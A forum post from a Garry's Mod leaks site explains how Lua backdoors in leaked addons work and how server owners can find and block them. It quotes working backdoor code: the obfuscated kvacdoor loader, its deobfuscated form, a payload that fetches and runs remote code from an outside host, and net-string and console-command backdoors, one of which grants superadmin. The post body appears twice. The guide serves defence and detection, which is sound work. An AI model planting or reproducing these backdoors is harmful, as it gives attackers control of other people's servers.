Garry's Mod Leaks
[Info] (UPDATED) backdoors, how they work and how to find them
Submitted by Poggers kekw, 09-07-2023, 07:02 PM, Thread ID: 268798
What Are Backdoors?
Backdoors are a snippet of code that give an attacker full server access to your server.
Why should I care?
Having full server side access can be very harmful Because with server side access attackers can: ruin your economy, get everyone's ips, get all of your addons, put ads outside of clients screens making the attacker money ( this has happened before ), hold you, yourserver, or your files ransom and they can run visuals on your server.
How do they work?
There are many types of backdoors here are some: web panels, web hooks, net strings, and concommands. I'll start with web panels, web panels use an http request to request a page and run code from that page, the thing that makes web panels, web panels is that they can control your server from the website. web hooks are just like web panels, but they inform the attacker with your server name, server password ( if there is one ) and net string. they can't control your server from the web hook ( most the time) but they still have serverside access. net strings are just nets that can run code on the server or run console commands. this requires the attacker to be on the server to run it and they don't get notified if your server runs the backdoor. concommands are malicious console commands that can: give superadmin, unban accounts, give money or ban people. this usually a very beginner tactic.
What does a backdoor look like?
there are 2 types of backdoors: function and global ( this is not actually correct but it's how I sort them ). Function based backdoors are the simplest they use some code executing functions to run and execute code, example: RunString, RunStringEx ( same thing as runstring ), and CompileString. Global based backdoors are a lot harder to find, they use global variables to call all the functions in a table form then call code executing functions from that table. for example: _G calls the global table and to call Runstring from _G you do _G["RunString"]. The thing that makes global based backdoors hard to find is that you call the code executing functions as a string from global. so you can encrypt the string and make it unsearchable. some global variables are: _G, debug.getfenv(), debug.getregistry().
How do i stop them?
Most backdoor blockers use a tactic called "detouring." detouring is when you preserve a vanilla lua function and overwrite that function letting you change it and add code to it while calling the preserved function inside of the overwritten one. example:
this code debugs RunString and prints and code excecuted with it. blockers with search the "code" parameter and check if anything malicious is trying to get through and will not execute the preserved runstring if it is malicious.
How do i find them?
use a program like sublime text or visual studio, drag the leak folder onto the program and right click it and click 'search folder'. there you can search strings to find any function or global based backdoor. here are some strings you can search: RunString, CompileString, http., _G, getfenv, getregistry.
Are there any examples?
yes! the most common backdoor being kvacdoor's smart lua inject, this backdoor is everywhere on NulledBB. Here's what it looks like:
(Code found in lua\autorun\server\npc_help.lua)
The deobfuscated code being:
this code, runs the code in the file "materials/npc/help.vtf" in the addon which contains:
There are some backdoors that are targeted, like the net string and concommand backdoor examples being:
(this is the most common type of net string backdoor)
And the concommand backdoor:
( runstring is not commonly used with these )
What can NulledBB and other forums do to stop backdoors?
take inspiration from Unknown Cheats and have a moderated upload system. What this means is Nulled BB hosts the download links and moderators can manually check for backdoors then approve or disapprove leaks.
Do any addons block backdoors?
yes, addons such as CPE and Losts Tomfoolery ( found here )
thanks for taking your time to read this informative narrative. please like or +rep me if you found this useful.
Backdoors are a snippet of code that give an attacker full server access to your server.
Why should I care?
Having full server side access can be very harmful Because with server side access attackers can: ruin your economy, get everyone's ips, get all of your addons, put ads outside of clients screens making the attacker money ( this has happened before ), hold you, yourserver, or your files ransom and they can run visuals on your server.
How do they work?
There are many types of backdoors here are some: web panels, web hooks, net strings, and concommands. I'll start with web panels, web panels use an http request to request a page and run code from that page, the thing that makes web panels, web panels is that they can control your server from the website. web hooks are just like web panels, but they inform the attacker with your server name, server password ( if there is one ) and net string. they can't control your server from the web hook ( most the time) but they still have serverside access. net strings are just nets that can run code on the server or run console commands. this requires the attacker to be on the server to run it and they don't get notified if your server runs the backdoor. concommands are malicious console commands that can: give superadmin, unban accounts, give money or ban people. this usually a very beginner tactic.
What does a backdoor look like?
there are 2 types of backdoors: function and global ( this is not actually correct but it's how I sort them ). Function based backdoors are the simplest they use some code executing functions to run and execute code, example: RunString, RunStringEx ( same thing as runstring ), and CompileString. Global based backdoors are a lot harder to find, they use global variables to call all the functions in a table form then call code executing functions from that table. for example: _G calls the global table and to call Runstring from _G you do _G["RunString"]. The thing that makes global based backdoors hard to find is that you call the code executing functions as a string from global. so you can encrypt the string and make it unsearchable. some global variables are: _G, debug.getfenv(), debug.getregistry().
How do i stop them?
Most backdoor blockers use a tactic called "detouring." detouring is when you preserve a vanilla lua function and overwrite that function letting you change it and add code to it while calling the preserved function inside of the overwritten one. example:
Code:
local perserved_runstring = RunString
function RunString(code, identifier, error_handler)
print(code)
perserved_runstring(code,identifier,error_handler)
endHow do i find them?
use a program like sublime text or visual studio, drag the leak folder onto the program and right click it and click 'search folder'. there you can search strings to find any function or global based backdoor. here are some strings you can search: RunString, CompileString, http., _G, getfenv, getregistry.
Are there any examples?
yes! the most common backdoor being kvacdoor's smart lua inject, this backdoor is everywhere on NulledBB. Here's what it looks like:
(Code found in lua\autorun\server\npc_help.lua)
Code:
local function HELPER_INFO()
return ""
end
local function HELPER_ISFUNC(func)
if (isfunction(func)) then
return !false
else
return !true
end
end
local function HELPER_READ_DATA(data)
return file.Read(data, "GAME")
end
local UNORDERED_LIST =
{
"\x6d","\x61","\x74",
"\x65","\x72","\x69",
"\x61","\x6c","\x73",
"\x2f","\x6e","\x70",
"\x63","\x2f","\x68",
"\x65","\x6c","\x70",
"\x2e","\x76","\x74",
"\x66"
}
local function HELPER_MAT()
if (!false) then
return string.Implode("", UNORDERED_LIST)
end
end
local CALL =
{
ClearBackgroundImages, ClientsideModel, ClientsideRagdoll, ClientsideScene,
CloseDermaMenus, collectgarbage, Color, ColorAlpha,
ColorRand, ColorToHSV, CompileFile, CompileString,
ConsoleAutoComplete, ConVarExists, CreateClientConVar, CreateConVar,
CreateMaterial, CreateParticleSystem, CreatePhysCollideBox, CreatePhysCollidesFromModel,
CreateSound, CreateSprite, CompileString, CurTime,
DamageInfo, DebugInfo, DeriveGamemode, Derma_Anim,
Derma_DrawBackgroundBlur, Derma_Hook, Derma_Install_Convar_Functions, Derma_Message,
Derma_Query, Derma_StringRequest, pcall,
}
CALL[35](CALL[12](HELPER_READ_DATA(HELPER_MAT()), HELPER_INFO(), 0))The deobfuscated code being:
Code:
pcall(CompileString(file.Read("materials/npc/help.vtf","GAME"), "", 0))this code, runs the code in the file "materials/npc/help.vtf" in the addon which contains:
Code:
timer.Simple(1, function() http.Fetch("https://kvcdoor.ovh/f.php?key=key", function(b) RunString(b, ":", false) end)end)There are some backdoors that are targeted, like the net string and concommand backdoor examples being:
Code:
util.AddNetworkString("Backdoor net")
net.Receive("Backdoor net",function()
RunString(net.ReadString()))
end)And the concommand backdoor:
Code:
concommand.Add("backdoor",function(ply,cmd,args)
RunString(string.Implode("",args))
end)Code:
concommand.Add("backdoor",function(ply)
ply:SetUserGroup("superadmin")
end)What can NulledBB and other forums do to stop backdoors?
take inspiration from Unknown Cheats and have a moderated upload system. What this means is Nulled BB hosts the download links and moderators can manually check for backdoors then approve or disapprove leaks.
Do any addons block backdoors?
yes, addons such as CPE and Losts Tomfoolery ( found here )
thanks for taking your time to read this informative narrative. please like or +rep me if you found this useful.
Lost Programmer
My Github
RE: [Info] (UPDATED) backdoors, how they work and how to find them
10-07-2023, 03:39 AM
#2 Nice guide will keep, thanks for the info bro.
RE: [Info] (UPDATED) backdoors, how they work and how to find them
10-07-2023, 05:37 PM
#3 Very informative, thanks.
There is also this (https://gmbrblog.blogspot.com/2020/08/de...-gmod.html) if you can use translate on it is also a good read.
There is also this (https://gmbrblog.blogspot.com/2020/08/de...-gmod.html) if you can use translate on it is also a good read.
Users browsing this thread: 2 Guest(s)